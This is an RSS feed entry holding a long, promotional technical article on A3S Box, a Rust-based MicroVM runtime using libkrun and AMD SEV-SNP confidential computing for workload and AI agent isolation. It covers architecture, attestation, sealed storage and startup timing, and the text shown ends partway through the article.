<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Roy Lin</title>
    <description>The latest articles on Forem by Roy Lin (@roylin).</description>
    <link>https://forem.com/roylin</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F711611%2F79264972-aaa1-458d-a8d1-d2f409b3e441.png</url>
      <title>Forem: Roy Lin</title>
      <link>https://forem.com/roylin</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/roylin"/>
    <language>en</language>
    <item>
      <title>A 40MB MicroVM Runtime Written in Rust — A Perfect Docker Replacement for AI Agent Sandboxes</title>
      <dc:creator>Roy Lin</dc:creator>
      <pubDate>Mon, 23 Feb 2026 19:12:22 +0000</pubDate>
      <link>https://forem.com/roylin/a-40mb-microvm-runtime-written-in-rust-a-perfect-docker-replacement-for-ai-agent-sandboxes-3dei</link>
      <guid>https://forem.com/roylin/a-40mb-microvm-runtime-written-in-rust-a-perfect-docker-replacement-for-ai-agent-sandboxes-3dei</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;When we strip away all the technical jargon and return to the essence of computing, a core question emerges: &lt;strong&gt;Can we run every workload on its own operating system kernel while maintaining container-level startup speed and developer experience?&lt;/strong&gt; A3S Box answers with a definitive yes — a single 40MB binary, no daemon, 200ms cold start, 52 Docker-compatible commands, hardware-level isolation, and optional confidential computing.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Introduction: Why We Need to Rethink Container Runtimes&lt;/li&gt;
&lt;li&gt;First Principles: Starting from the Fundamental Question&lt;/li&gt;
&lt;li&gt;Architecture Overview: Seven Crates in Precise Collaboration&lt;/li&gt;
&lt;li&gt;Core Value 1: True Hardware-Level Isolation&lt;/li&gt;
&lt;li&gt;Core Value 2: Confidential Computing and Zero-Trust Security&lt;/li&gt;
&lt;li&gt;Core Value 3: MicroVM with 200ms Cold Start&lt;/li&gt;
&lt;li&gt;Core Value 4: Full Docker-Compatible Experience&lt;/li&gt;
&lt;li&gt;Core Value 5: Secure Isolation Sandbox for AI Agents&lt;/li&gt;
&lt;li&gt;Deep Dive: VM Lifecycle State Machine&lt;/li&gt;
&lt;li&gt;TEE Confidential Computing: The Trust Chain from Hardware to Application&lt;/li&gt;
&lt;li&gt;Vsock Communication Protocol: The Bridge Between Host and Guest&lt;/li&gt;
&lt;li&gt;OCI Image Processing Pipeline: From Registry to Root Filesystem&lt;/li&gt;
&lt;li&gt;Network Architecture: Three Flexible Modes&lt;/li&gt;
&lt;li&gt;Guest Init: PID 1 Inside the MicroVM&lt;/li&gt;
&lt;li&gt;Warm Pool: The Ultimate Solution to Cold Starts&lt;/li&gt;
&lt;li&gt;Seven-Layer Defense-in-Depth Security Model&lt;/li&gt;
&lt;li&gt;Observability: Prometheus, OpenTelemetry, and Auditing&lt;/li&gt;
&lt;li&gt;Kubernetes Integration: CRI Runtime&lt;/li&gt;
&lt;li&gt;SDK Ecosystem: Unified Rust, Python, and TypeScript&lt;/li&gt;
&lt;li&gt;Comparative Analysis with Existing Solutions&lt;/li&gt;
&lt;li&gt;Future Outlook and Summary&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  1. Introduction: Why We Need to Rethink Container Runtimes
&lt;/h2&gt;

&lt;p&gt;Over the past decade, Docker and container technology have fundamentally transformed how software is delivered. Developers can package applications and their dependencies into a standardized image and run it in any environment that supports a container runtime. This "build once, run anywhere" philosophy has dramatically improved development efficiency and deployment consistency.&lt;/p&gt;

&lt;p&gt;However, as cloud-native architectures have matured, the fundamental limitations of traditional container runtimes have become increasingly apparent:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The shared-kernel security dilemma.&lt;/strong&gt; Traditional containers (such as runc used by Docker) are essentially Linux kernel process isolation mechanisms — resource isolation through namespaces and cgroups. But all containers share the same host kernel. This means a single kernel vulnerability (such as CVE-2022-0185 or CVE-2022-0847 "Dirty Pipe") can allow an attacker to escape from any container to the host, gaining control over all workloads on the same node.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The trust crisis in multi-tenant environments.&lt;/strong&gt; In public cloud and edge computing scenarios, workloads from different tenants run on the same physical hardware. Even with container isolation, there is no hardware-level trust boundary between tenants. Cloud service provider administrators can theoretically access any tenant's in-memory data — which is unacceptable when handling medical records, financial data, or personal privacy information.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The performance-security tradeoff.&lt;/strong&gt; Existing solutions either sacrifice performance for security (traditional VMs take seconds to tens of seconds to start) or sacrifice security for performance (containers provide insufficient isolation strength). Projects like Kata Containers and Firecracker attempt to find a balance between the two, but each still has its own limitations.&lt;/p&gt;

&lt;p&gt;A3S Box was created precisely to fundamentally resolve this contradiction.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;📖 For complete documentation and API reference, visit: &lt;a href="https://a3s-lab.github.io/a3s/" rel="noopener noreferrer"&gt;https://a3s-lab.github.io/a3s/&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  2. First Principles: Starting from the Fundamental Question
&lt;/h2&gt;

&lt;p&gt;To understand A3S Box's design decisions, we need to set aside analogies and conventions, return to the most basic facts, and reason upward from there. Let's re-examine "running a workload" through this lens.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 What Is the Essence of Workload Isolation?
&lt;/h3&gt;

&lt;p&gt;From a physics perspective, isolation means there are no channels for information leakage between two systems. In computing, this means:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Memory isolation&lt;/strong&gt;: Workload A cannot read or write workload B's memory space&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Execution isolation&lt;/strong&gt;: Workload A's code execution does not affect workload B's execution flow&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;I/O isolation&lt;/strong&gt;: Workload A's input/output cannot be intercepted or tampered with by workload B&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Temporal isolation&lt;/strong&gt;: Workload A's resource consumption does not cause performance degradation for workload B&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Traditional containers only implement these isolations at the operating system level — through the kernel's namespace and cgroup mechanisms. But the kernel itself is shared, meaning the strength of isolation depends on the correctness of the kernel code. The Linux kernel has over 30 million lines of code, with hundreds of security vulnerabilities discovered each year. Relying on such a massive codebase to guarantee isolation is fundamentally unreliable.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 Hardware Isolation Is the Only Fundamental Solution
&lt;/h3&gt;

&lt;p&gt;If we cannot trust software to provide perfect isolation, the only option is to leverage hardware. Modern processors provide two levels of hardware isolation:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Level 1: Virtualization extensions (Intel VT-x / AMD-V / Apple HVF).&lt;/strong&gt; The processor distinguishes between host mode (VMX root) and guest mode (VMX non-root) at the hardware level. Code running in guest mode cannot directly access the host's memory or devices; any sensitive operation triggers a VM Exit, handled by the host's VMM (Virtual Machine Monitor). This provides much stronger guarantees than OS-level isolation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Level 2: Memory encryption (AMD SEV-SNP / Intel TDX).&lt;/strong&gt; Going further, modern processors can hardware-encrypt a virtual machine's memory. Even an attacker with physical access (including cloud service provider administrators) cannot read the plaintext data in VM memory. This is what's known as "Confidential Computing."&lt;/p&gt;

&lt;h3&gt;
  
  
  2.3 A3S Box's Core Insight
&lt;/h3&gt;

&lt;p&gt;A3S Box's core insight can be summarized in one sentence:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;MicroVM + Confidential Computing + Container Experience = Unity of Security and Efficiency&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Specifically:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;One MicroVM per workload&lt;/strong&gt;: Using libkrun to start a lightweight virtual machine in ~200ms, each workload has its own independent Linux kernel. This is not container-level "fake isolation" but hardware-enforced true isolation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Optional confidential computing&lt;/strong&gt;: On hardware supporting AMD SEV-SNP, the MicroVM's memory is hardware-encrypted. Even if the host machine is completely compromised, attackers cannot read data inside the MicroVM.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Docker-compatible user experience&lt;/strong&gt;: 52 Docker-compatible commands — developers don't need to learn new tools. &lt;code&gt;a3s-box run nginx&lt;/code&gt; is as simple as &lt;code&gt;docker run nginx&lt;/code&gt;, but with a completely different security model underneath.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The combination of these three elements makes A3S Box not an incremental improvement over existing container runtimes, but a paradigm shift — from "process isolation with a shared kernel" to "hardware isolation with independent kernels."&lt;/p&gt;

&lt;h3&gt;
  
  
  2.4 Why libkrun?
&lt;/h3&gt;

&lt;p&gt;When choosing a virtualization backend, A3S Box selected libkrun over QEMU or Firecracker. This choice also went through rigorous technical evaluation:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;QEMU&lt;/th&gt;
&lt;th&gt;Firecracker&lt;/th&gt;
&lt;th&gt;libkrun&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Startup time&lt;/td&gt;
&lt;td&gt;Seconds&lt;/td&gt;
&lt;td&gt;~125ms&lt;/td&gt;
&lt;td&gt;~200ms&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory overhead&lt;/td&gt;
&lt;td&gt;Tens of MB&lt;/td&gt;
&lt;td&gt;~5 MB&lt;/td&gt;
&lt;td&gt;~10 MB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Code complexity&lt;/td&gt;
&lt;td&gt;Very high (millions of lines)&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;Low (library form)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS support&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Not supported&lt;/td&gt;
&lt;td&gt;Native HVF&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux support&lt;/td&gt;
&lt;td&gt;KVM&lt;/td&gt;
&lt;td&gt;KVM&lt;/td&gt;
&lt;td&gt;KVM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Embedding method&lt;/td&gt;
&lt;td&gt;Separate process&lt;/td&gt;
&lt;td&gt;Separate process&lt;/td&gt;
&lt;td&gt;Library call&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;libkrun's unique advantage is that it is a &lt;strong&gt;library&lt;/strong&gt; rather than a standalone process. This means A3S Box can embed the VMM directly into its own process space, reducing inter-process communication overhead, while providing native support on macOS through Apple Hypervisor Framework (HVF) — which is critical for developer experience, as many developers use macOS for daily development.&lt;/p&gt;




&lt;h2&gt;
  
  
  3. Architecture Overview: Seven Crates in Precise Collaboration
&lt;/h2&gt;

&lt;p&gt;A3S Box is written in Rust, with the entire project consisting of seven crates, 218 source files, 1,466 unit tests, and 7 integration tests. This modular design follows the "minimal core + external extensions" architectural philosophy.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Crate Topology
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────────────────────────────┐
│                        a3s-box-cli                              │
│                  52 Docker-compatible commands                   │
│                       (361 tests)                               │
├─────────────────────────────────────────────────────────────────┤
│                       a3s-box-sdk                               │
│              Rust / Python / TypeScript SDK                     │
├──────────────────────┬──────────────────────────────────────────┤
│   a3s-box-cri        │           a3s-box-runtime                │
│  Kubernetes CRI      │  VM lifecycle, OCI, TEE, networking      │
│                      │           (678 tests)                    │
├──────────────────────┴──────────────────────────────────────────┤
│                       a3s-box-core                              │
│        Config, error types, events, Trait definitions           │
│                       (331 tests)                               │
├─────────────────────────────────────────────────────────────────┤
│  a3s-box-shim        │        a3s-box-guest-init                │
│  libkrun bridge shim │  Guest PID 1 / Exec / PTY / Attestation  │
├──────────────────────┴──────────────────────────────────────────┤
│                      libkrun-sys                                │
│                   libkrun FFI bindings                          │
└─────────────────────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.2 Crate Responsibilities
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-core (Core Layer)&lt;/strong&gt;: Defines all core abstractions — configuration structs, error types (&lt;code&gt;BoxError&lt;/code&gt; enum with 15 variants), event system, and key Trait interfaces. This is the "contract layer" of the entire system; all other crates depend on it, but it depends on no other A3S crates.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-runtime (Runtime Layer)&lt;/strong&gt;: Implements VM lifecycle management, OCI image pulling and caching, TEE confidential computing, network configuration, warm pool, auto-scaling, and other core functionality. This is the most complex crate in the system, with 678 unit tests.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-cli (CLI Layer)&lt;/strong&gt;: Provides 52 Docker-compatible commands and is the primary interface for user interaction with the system. It translates user commands into calls to the runtime layer.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-shim (VMM Bridge Layer)&lt;/strong&gt;: Runs as an independent subprocess, responsible for calling the libkrun FFI interface to create and manage MicroVMs. This process-isolation design ensures that a VMM crash does not affect the main process.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-guest-init (Guest Initialization)&lt;/strong&gt;: Compiled as a static binary, runs as PID 1 inside the MicroVM. Responsible for mounting filesystems, configuring networking, and starting Exec/PTY/Attestation servers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-cri (Kubernetes Integration Layer)&lt;/strong&gt;: Implements the CRI (Container Runtime Interface) protocol, allowing A3S Box to run as a Kubernetes RuntimeClass.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a3s-box-sdk (SDK Layer)&lt;/strong&gt;: Provides an embedded Rust SDK, and generates Python and TypeScript bindings via PyO3 and napi-rs respectively.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.3 Core Trait System
&lt;/h3&gt;

&lt;p&gt;A3S Box's extensibility is built on a set of carefully designed Traits. These Traits define the system's extension points, and each Trait has a default implementation to ensure the system works out of the box:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Trait&lt;/th&gt;
&lt;th&gt;Responsibility&lt;/th&gt;
&lt;th&gt;Default Implementation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;VmmProvider&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Start VM from InstanceSpec&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;VmController&lt;/code&gt; (shim subprocess)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;VmHandler&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Lifecycle operations for running VMs&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ShimHandler&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ImageRegistry&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OCI image pulling and caching&lt;/td&gt;
&lt;td&gt;&lt;code&gt;RegistryPuller&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CacheBackend&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Directory-level LRU cache&lt;/td&gt;
&lt;td&gt;&lt;code&gt;RootfsCache&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;MetricsCollector&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Runtime metrics collection&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;RuntimeMetrics&lt;/code&gt; (Prometheus)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;TeeExtension&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;TEE attestation, sealing, key injection&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SnpTeeExtension&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;AuditSink&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Audit event persistence&lt;/td&gt;
&lt;td&gt;JSON-lines file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CredentialProvider&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Registry authentication&lt;/td&gt;
&lt;td&gt;Docker config.json&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;EventBus&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Event publish/subscribe&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;EventEmitter&lt;/code&gt; (tokio broadcast)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The elegance of this design lies in: the core components (5) remain stable and non-replaceable, while the extension points (14) can evolve independently. Users can replace any extension without touching the core — this is the embodiment of the "minimal core + external extensions" principle.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Core Value 1: True Hardware-Level Isolation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  4.1 From Namespaces to Hypervisor
&lt;/h3&gt;

&lt;p&gt;The isolation model of traditional containers can be compared to "different rooms in the same building" — there are walls between rooms (namespaces), but they share the same foundation (kernel). If the foundation cracks, all rooms are affected.&lt;/p&gt;

&lt;p&gt;A3S Box's isolation model is "a separate building for each workload" — each MicroVM has its own Linux kernel, isolated from the host through hardware virtualization extensions (Intel VT-x / AMD-V / Apple HVF). Even if an attacker gains root privileges inside a MicroVM and exploits a kernel vulnerability, they can only affect that MicroVM itself — because the VM Exit mechanism ensures that any sensitive operation must be reviewed by the host's VMM.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Layered Isolation
&lt;/h3&gt;

&lt;p&gt;A3S Box doesn't rely solely on virtualization for isolation. It also stacks multiple OS-level isolation layers inside the MicroVM, forming a defense-in-depth:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────┐
│            Application Process           │
├─────────────────────────────────────────┤
│  Seccomp BPF │ Capabilities │ no-new-priv│  &amp;lt;- Syscall level
├─────────────────────────────────────────┤
│  Mount NS │ PID NS │ IPC NS │ UTS NS    │  &amp;lt;- Namespace level
├─────────────────────────────────────────┤
│  cgroup v2 (CPU/Memory/PID limits)      │  &amp;lt;- Resource limit level
├─────────────────────────────────────────┤
│           Independent Linux Kernel       │  &amp;lt;- Kernel level
├─────────────────────────────────────────┤
│     Hardware Virtualization (VT-x / AMD-V / HVF)  │  &amp;lt;- Hardware level
├─────────────────────────────────────────┤
│  AMD SEV-SNP / Intel TDX (optional)     │  &amp;lt;- Memory encryption level
└─────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This multi-layer stacking design means that even if one layer is breached, the attacker still faces obstacles from other layers. This is not "choose the strongest single layer," but "every layer increases the cost of attack."&lt;/p&gt;

&lt;h3&gt;
  
  
  4.3 Guest Init's Secure Boot Chain
&lt;/h3&gt;

&lt;p&gt;The PID 1 process inside the MicroVM (&lt;code&gt;a3s-box-guest-init&lt;/code&gt;) is a critical link in the security model. It is compiled as a statically linked Rust binary, with no dependency on any dynamic libraries, minimizing the attack surface.&lt;/p&gt;

&lt;p&gt;Guest Init startup sequence:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Mount base filesystems: &lt;code&gt;/proc&lt;/code&gt; (procfs), &lt;code&gt;/sys&lt;/code&gt; (sysfs), &lt;code&gt;/dev&lt;/code&gt; (devtmpfs)&lt;/li&gt;
&lt;li&gt;Mount virtio-fs shared filesystem (rootfs passed in from host)&lt;/li&gt;
&lt;li&gt;Configure network interface (via raw syscalls, no dependency on &lt;code&gt;iproute2&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Apply security policies (Seccomp, Capabilities, no-new-privileges)&lt;/li&gt;
&lt;li&gt;Start three vsock servers:

&lt;ul&gt;
&lt;li&gt;Port 4089: Exec server (command execution)&lt;/li&gt;
&lt;li&gt;Port 4090: PTY server (interactive terminal)&lt;/li&gt;
&lt;li&gt;Port 4091: Attestation server (TEE attestation, TEE mode only)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Wait for host connection&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The entire process requires no systemd, no shell, no userspace tools — this is a minimal, security-designed initialization flow.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. Core Value 2: Confidential Computing and Zero-Trust Security
&lt;/h2&gt;

&lt;h3&gt;
  
  
  5.1 What Is Confidential Computing?
&lt;/h3&gt;

&lt;p&gt;Confidential Computing is a hardware security technology that protects data while it is being processed (in-use). Traditional security measures protect data at rest (via disk encryption) and data in transit (via TLS), but data being processed typically exists in plaintext in memory.&lt;/p&gt;

&lt;p&gt;AMD SEV-SNP (Secure Encrypted Virtualization - Secure Nested Paging) changes this through the following mechanisms:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Memory encryption&lt;/strong&gt;: Each virtual machine has an independent AES encryption key, managed by the processor's security processor (PSP). The host's VMM cannot read the VM's memory in plaintext.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integrity protection&lt;/strong&gt;: SNP (Secure Nested Paging) adds memory integrity protection on top of SEV-ES, preventing the host from tampering with the VM's memory contents.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remote attestation&lt;/strong&gt;: The VM can generate a hardware-signed attestation report, proving it is running on genuine AMD SEV-SNP hardware and that the initial memory contents (measurement) have not been tampered with.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  5.2 A3S Box's TEE Implementation
&lt;/h3&gt;

&lt;p&gt;A3S Box's TEE subsystem contains 12 modules, covering the complete chain from hardware detection to application-layer key management:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hardware detection&lt;/strong&gt;: At system startup, the system automatically probes &lt;code&gt;/dev/sev-guest&lt;/code&gt;, &lt;code&gt;/dev/sev&lt;/code&gt;, &lt;code&gt;/dev/tdx_guest&lt;/code&gt; device files, and the &lt;code&gt;/sys/module/kvm_amd/parameters/sev_snp&lt;/code&gt; parameter. If hardware is unavailable but the &lt;code&gt;A3S_TEE_SIMULATE=1&lt;/code&gt; environment variable is set, it enters simulation mode — which is critical for development and testing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Attestation report generation&lt;/strong&gt;: When a verifier sends an &lt;code&gt;AttestationRequest&lt;/code&gt; containing a nonce and optional user_data, Guest Init combines them via SHA-512 into a 64-byte &lt;code&gt;report_data&lt;/code&gt;, then calls the &lt;code&gt;/dev/sev-guest&lt;/code&gt; device via &lt;code&gt;SNP_GET_REPORT&lt;/code&gt; ioctl to generate an attestation report. The report is 1184 bytes and contains:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Offset 0x00-0x04: version (u32 LE)        — report format version
Offset 0x04-0x08: guest_svn (u32 LE)      — guest security version number
Offset 0x08-0x10: policy (u64 LE)         — security policy flags
Offset 0x38-0x40: current_tcb             — trusted computing base version
Offset 0x90-0xC0: measurement (48 bytes)  — SHA-384 hash of initial memory
Offset 0x1A0-0x1E0: chip_id (64 bytes)   — physical processor unique identifier
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Certificate chain verification&lt;/strong&gt;: A3S Box implements complete AMD certificate chain verification:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;AMD Root Key (ARK)          &amp;lt;- AMD's hardcoded root trust anchor
    |
    +-- AMD SEV Key (ASK)   &amp;lt;- Intermediate certificate
    |       |
    |       +-- VCEK        &amp;lt;- Chip-level certificate (unique per physical processor)
    |               |
    |               +-- SNP Report Signature  &amp;lt;- Attestation report signature
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Certificates are obtained from AMD's KDS (Key Distribution Service): &lt;code&gt;https://kds.amd.com/vcek/v1/{product}/{chip_id}&lt;/code&gt;, and cached locally to avoid repeated network requests.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.3 RA-TLS: Embedding Attestation into TLS
&lt;/h3&gt;

&lt;p&gt;RA-TLS (Remote Attestation TLS) is a key innovation in A3S Box. It embeds the SNP attestation report into the extension fields of an X.509 certificate, so that the TLS handshake process simultaneously completes both identity verification and remote attestation.&lt;/p&gt;

&lt;p&gt;This means: when the host establishes a TLS connection with the MicroVM, it not only verifies the identity of the communication peer, but also verifies that the peer is indeed running in a trusted TEE environment. This eliminates the TOCTOU (Time-of-Check-Time-of-Use) vulnerability that arises from separating attestation and communication in traditional approaches.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.4 Sealed Storage
&lt;/h3&gt;

&lt;p&gt;Sealed Storage allows a MicroVM to encrypt and persist sensitive data, which can only be decrypted in the same (or compatible) TEE environment. A3S Box uses AES-256-GCM encryption, HKDF-SHA256 key derivation, and provides three sealing policies:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Policy&lt;/th&gt;
&lt;th&gt;Binding Factor&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;MeasurementAndChip&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Image hash + physical chip ID&lt;/td&gt;
&lt;td&gt;Strictest: data bound to specific image and specific hardware&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;MeasurementOnly&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Image hash only&lt;/td&gt;
&lt;td&gt;Can migrate across hardware, but must be the same image&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ChipOnly&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Physical chip ID only&lt;/td&gt;
&lt;td&gt;Survives firmware updates, but bound to specific hardware&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Additionally, sealed storage implements version-based rollback protection (&lt;code&gt;VersionStore&lt;/code&gt;), preventing attackers from replacing newer sealed data with older versions.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Core Value 3: MicroVM with 200ms Cold Start
&lt;/h2&gt;

&lt;h3&gt;
  
  
  6.1 Why Does Startup Speed Matter?
&lt;/h3&gt;

&lt;p&gt;In serverless and event-driven architectures, workload lifetimes may be only a few hundred milliseconds to a few seconds. If a virtual machine takes seconds to start, the startup overhead would account for a large proportion of the total workload time, making MicroVM solutions impractical in these scenarios.&lt;/p&gt;

&lt;p&gt;A3S Box achieves approximately 200ms cold start time through libkrun. This number means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;For a serverless function with 1-second execution time, startup overhead is only 20%&lt;/li&gt;
&lt;li&gt;For interactive workloads, users barely perceive the startup delay&lt;/li&gt;
&lt;li&gt;In CI/CD scenarios, each build step can run in an independent MicroVM without significantly increasing total build time&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  6.2 Startup Flow Optimization
&lt;/h3&gt;

&lt;p&gt;A3S Box's startup flow is carefully optimized:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[0ms]    VmController::start() is called
[5ms]    Locate a3s-box-shim binary
[10ms]   macOS: check/sign hypervisor entitlement
[15ms]   Serialize InstanceSpec to JSON
[20ms]   Start shim subprocess
[25ms]   shim calls libkrun FFI to create VM context
[30ms]   Configure vCPU, memory, virtio-fs, vsock
[50ms]   libkrun starts VM (kernel boot)
[150ms]  Guest Init (PID 1) begins execution
[160ms]  Mount filesystems
[170ms]  Configure networking
[180ms]  Start vsock servers
[200ms]  VM ready, accepting commands
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  6.3 Warm Pool: Eliminating Cold Starts
&lt;/h3&gt;

&lt;p&gt;For scenarios extremely sensitive to latency, A3S Box provides a Warm Pool mechanism — pre-starting a batch of MicroVMs so that when a request arrives, a ready VM is directly allocated, achieving near-zero startup latency.&lt;/p&gt;

